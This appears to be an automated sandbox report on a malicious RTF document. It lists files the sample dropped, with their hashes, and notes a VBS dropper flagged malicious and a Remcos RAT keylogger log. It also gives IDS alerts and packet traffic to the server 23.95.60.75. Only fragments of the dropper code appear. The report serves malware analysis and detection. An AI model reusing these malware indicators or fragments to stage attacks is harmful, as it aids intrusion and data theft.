C:\Users\user\AppData\Local\Temp\bcuddmnf.io2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\gxfkmmxd.ei4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\kfw0jrvb.zg3.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\u2lbs54f.fh3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\vbslj50e.2tc.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\IEneetworkinglover.vbs

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (771), with CRLF line terminators
Category:	dropped
Size (bytes):	114022
Entropy (8bit):	3.7159705325755374
Encrypted:	false
SSDEEP:	1536:y++/U1lBHFcJUJI+YZb5bJ9Gmgz/+rtfRDFqGb5uJZUU0tKl9CP8Z:y/U1DHFUGmgURDFBe0tKl9CP4
MD5:	42D96A63FE345FE4A01752E1DCB06D1D
SHA1:	F8D791007C1507CD15FDB53EE3F0CA477E7698EA
SHA-256:	D27CB4DE5A03F7B59AB211482839E4D18EC395C136079735636CA23B096531D0
SHA-512:	B87B3F16A8F437731E8E26FB09478A708F0A079EEEBD5CD22CAC3F23F239C521A34C837FAFACB1C979109BB173DC6227008F0C70DF57A897A52461F2D0721B83
Malicious:	true
Preview:	......'.....c.o.n.s.t. .b.r.o.s.i.m.o. . . . . . . . . . .=. .0.....c.o.n.s.t. .k.A.c.t.i.o.n.D.e.l.e.t.e. . . . . . . .=. .1.....c.o.n.s.t. .k.A.c.t.i.o.n.L.i.s.t. . . . . . . . . .=. .2.....c.o.n.s.t. .b.r.e.n.s.e.d.a. . . . . . .=. .3.....c.o.n.s.t. .a.r.a.v.i.a. . . . . . . . . . .=. .4.....c.o.n.s.t. .m.o.r.i.b.u.n.d.o. . . . . . . . . . .=. .5.........c.o.n.s.t. .v.i.l.i.a.s.t.r.o. . . . . . . .=. .0.....c.o.n.s.t. .K.E.r.r.o.r.F.a.i.l.u.r.e. . . . . . . .=. .1.........c.o.n.s.t. .k.F.l.a.g.C.r.e.a.t.e.O.r.U.p.d.a.t.e. .=. .0.........c.o.n.s.t. .a.g.u.s.t.i.n.a. . . . . . . . . . .=. .".r.o.o.t.\.c.i.m.v.2.".............'.....'. .C.o.n.s.t.a.n.t.s. .f.o.r. .t.h.e. .p.a.r.a.m.e.t.e.r. .d.i.c.t.i.o.n.a.r.y.....'.....c.o.n.s.t. .a.d.i.n.a.m.i.a. . . . . . .=. .1.....c.o.n.s.t. .s.u.x.o. . . . . . . . .=. .2.....c.o.n.s.t. .k.D.o.u.b.l.e.S.p.o.o.l. . . . . .=. .3.....c.o.n.s.t. .k.P.o.r.t.N.u.m.b.e.r. . . . . . .=. .4.....c.o.n.s.t. .k.P.o.r.t.T.y.p.e. . . . . . . . .=. .5.....c.o.n.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Sat Apr 20 08:35:54 2024, length=73827, window=hide
Category:	dropped
Size (bytes):	1209
Entropy (8bit):	4.550036278538251
Encrypted:	false
SSDEEP:	24:8y//XTUyQbk1LVHCNXU/reMWHCNXUZDv3qRMk7N:8y//XTU/bGHCdg2HCdtRMiN
MD5:	0218A2E0526F0795E70FA33D88666857
SHA1:	FFA4346CE7FBAE9D2621A7CD42161194DB9C7BE9
SHA-256:	893D6537E13C814B59023191E962F3C1569710D4CC6675FC1F8D77529CD84208
SHA-512:	581F1F1EC863C2AE6DC747651D0C1FEADF5B9D1E52ACDE63F7F14AF67A9CA6049AC24C149813160C5412F7CB7882070E186D0120EF4DD42C379CB44126837A93
Malicious:	false
Preview:	L..................F.... ...."5.r...."5.r......$....c ...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......XyL..user.8......QK.X.XyL...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.c ...X\|L .SECURI~1.RTF..........WD..WD..........................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.h.e.l.l.C.o.d.e...6.9...1.4.4.9.8...2.2.6.2.3...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf.L.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...E.x.p.l.o.i.t...S.h.e.l.l.C.o.d.e...6.9...1.4.4.9.8...2.2.6.2.3...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m.......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	133
Entropy (8bit):	4.936773342636333
Encrypted:	false
SSDEEP:	3:H9rbcNuL3srTY6YCm4P8bcNuL3srTY6YCv:H9rwvH5YdwvH5Ys
MD5:	CECE041925C4593858F2E935DCC879F8
SHA1:	4536399979CB308F88788883B738B0CB02171334
SHA-256:	253DD2844CB6222C042AC1138DC95D4A1ECF690474A3A7A5EDEF335AF4CF7D60
SHA-512:	D52C359564A71DF2E94CBC35E51426BECE7C502364B91F8266B7847BC4EDF514FF7FDFEF33310FC98BD9384DD96E4053B6A42E21B841A8BB6D6C08C7737052E9
Malicious:	false
Preview:	[misc]..SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.LNK=0..[folders]..SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
MD5:	EB62D355909FD3DD98A808A4D456667D
SHA1:	71A4875D461DDDB4D9EFA05E2529D67E79E558C2
SHA-256:	4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
SHA-512:	542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\notess\logs.dat

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	596
Entropy (8bit):	3.47156924625729
Encrypted:	false
SSDEEP:	12:6lnUIXec8e5De5TwB/IWUy6wB/Uyp50/W+:6lUIOcJ8UJIWUqJUE50/W+
MD5:	81C46C79F35BBCAE08FB6B5BE1C44A77
SHA1:	AC01498F0FBFC4998294664D1975E8CD1E58679D
SHA-256:	660201EFB4A994C80D9929D3105959F344C40CD33779D6D2D12E60752E1F8E49
SHA-512:	7C7B3494D5E6023CFB6ADE52232A3ADDFAF5ED984A47A74797BC7BC468117D44246BD5AB9BA9B4BA50B9A1D4D67DAF312245275828A347FBA25CEA962AC30FCF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Roaming\notess\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.0.4./.2.0. .1.1.:.3.6.:.1.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].....[.W.i.n.].r.....[.R.u.n.].....[.W.i.n.].r.....[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.W.i.n.d.o.w.s. .S.c.r.i.p.t. .H.o.s.t.].........[.i.m.g.s. .[.C.o.m.p.a.t.i.b.i.l.i.t.y. .M.o.d.e.]. .-. .M.i.c.r.o.s.o.f.t. .W.o.r.d.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\Desktop\~$curiteInfo.com.Exploit.ShellCode.69.14498.22623.rtf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyQGJl+l0OlMW3sFlc3GHllln:vdsCkWtqJA2OR23H/l
MD5:	EB62D355909FD3DD98A808A4D456667D
SHA1:	71A4875D461DDDB4D9EFA05E2529D67E79E558C2
SHA-256:	4D2B40205AC6CB3AFBDEEFB9AB942DC5BBE581B45B78CEF5AB9AAA5AA64BD1CA
SHA-512:	542F99E4D15F040F434C609E2D95DE610EC2ABB8133C18A699DECE8F9490436FC5D4A86669AADFEF84FA8B8A901FD30323AA881D7B91B8B33C89AC4919CB578D
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	2.9960327048379956
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtf
File size:	73'827 bytes
MD5:	bce2afb27ee0e6f7c7696384377941d9
SHA1:	784949119f9a0e8f33a9a6d877de4af4723c7d27
SHA256:	b2b8ef2a3bf64dd5531bd414e7f946c9f040ab2674bc73eb0d4af0d314623174
SHA512:	f60b9990bc2309b6c3a364710964eb19206672e3c7c08bd7a02e145a0f33762536691e5c168a7c9844c35a2857a6be609283a96bbe08ab4bcd293ee5279a7c51
SSDEEP:	1536:IXJHYanR12k0HtQ00cZ5iKBKEb0mNqgEmLDg8/RtPo8J6Xswq9i8uZYA5xOw0NXk:6Hn0HtQ00/KBKmNqglLE8Ztg8J6Xswqw
TLSH:	FE73BD2AE70F0925EF51A67B435A4B4909FCB33DB38540B579AC873437ADC2E466287C
File Content Preview:	{\rtf1..............{\\groupTop170837815 \:}.{\935650164.)%9/8@.>?1.1.9&$6=$?~$~-(?,.8:(10-!^-~.5]+3$5/)<(2&86...??[\|1~%%+3.]9]?%1)%]_,-7~^?/[1(/`#?#45.20((9?:@>.<2=%?!&.4(!-9_.%]\|5??#=.)/??&]'.7!3/$@!@%.&@(7\|;=6%0,4???(?]?[,.&7??'.?[<1!&=?3`3@-!!

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0000158Dh								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/20/24-11:36:12.276147	TCP	2020424	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M1	80	49165	23.95.60.75	192.168.2.22
04/20/24-11:36:12.276147	TCP	2020423	ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1	80	49165	23.95.60.75	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 11:35:58.330288887 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.482458115 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.482517004 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.482812881 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.637557030 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.637645006 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.637685061 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.637722969 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.637759924 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.637797117 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.637810946 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.637835026 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.637923956 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.637923956 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.637923956 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.637923956 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.637923956 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.637934923 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.637974024 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.638010025 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.638015985 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.638058901 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.638058901 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.642658949 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.791728973 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.791759968 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.791899920 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.791919947 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.791938066 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.791944981 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.791959047 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.791963100 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.791977882 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.791996956 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792015076 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792033911 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792037010 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792037010 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792052984 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792058945 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792071104 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792088985 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792119026 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792123079 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792123079 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792136908 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792145014 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792155981 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792172909 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792176008 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792191982 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792212009 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792229891 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.792268991 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792268991 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792268991 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.792311907 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.793138981 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944345951 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944389105 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944406986 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944427013 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944427013 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944438934 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944461107 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944479942 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944488049 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944488049 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944509983 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944509983 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944519997 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944539070 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944555998 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944571018 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944575071 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944592953 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944612026 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944629908 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944648027 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944660902 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944660902 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944660902 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944660902 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944660902 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944668055 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944694042 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944694042 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944711924 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944725990 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944745064 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944762945 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944797993 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944802999 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944802999 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944802999 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944834948 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944875956 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944911957 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944926023 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.944952011 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.944969893 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945008993 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945019960 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945019960 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945046902 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945082903 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945085049 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945122004 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945127010 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945127010 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945159912 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945171118 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945198059 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945235968 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945235968 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945267916 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945274115 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945312023 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945346117 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945346117 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945349932 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945364952 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945388079 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945426941 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945453882 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945470095 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945478916 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945478916 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945478916 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945488930 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.945503950 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945568085 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.945568085 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.946074963 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.946093082 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:58.946156979 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.946156979 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:58.946427107 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097270966 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097342968 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097364902 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097381115 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097400904 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097419024 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097436905 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097479105 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097479105 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097479105 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097479105 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097479105 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097495079 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097558975 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097614050 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097650051 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097687960 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097723961 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097759962 CEST	80	49161	23.95.60.75	192.168.2.22
Apr 20, 2024 11:35:59.097775936 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097776890 CEST	49161	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:35:59.097776890 CEST	49161	80	192.168.2.22	23.95.60.75
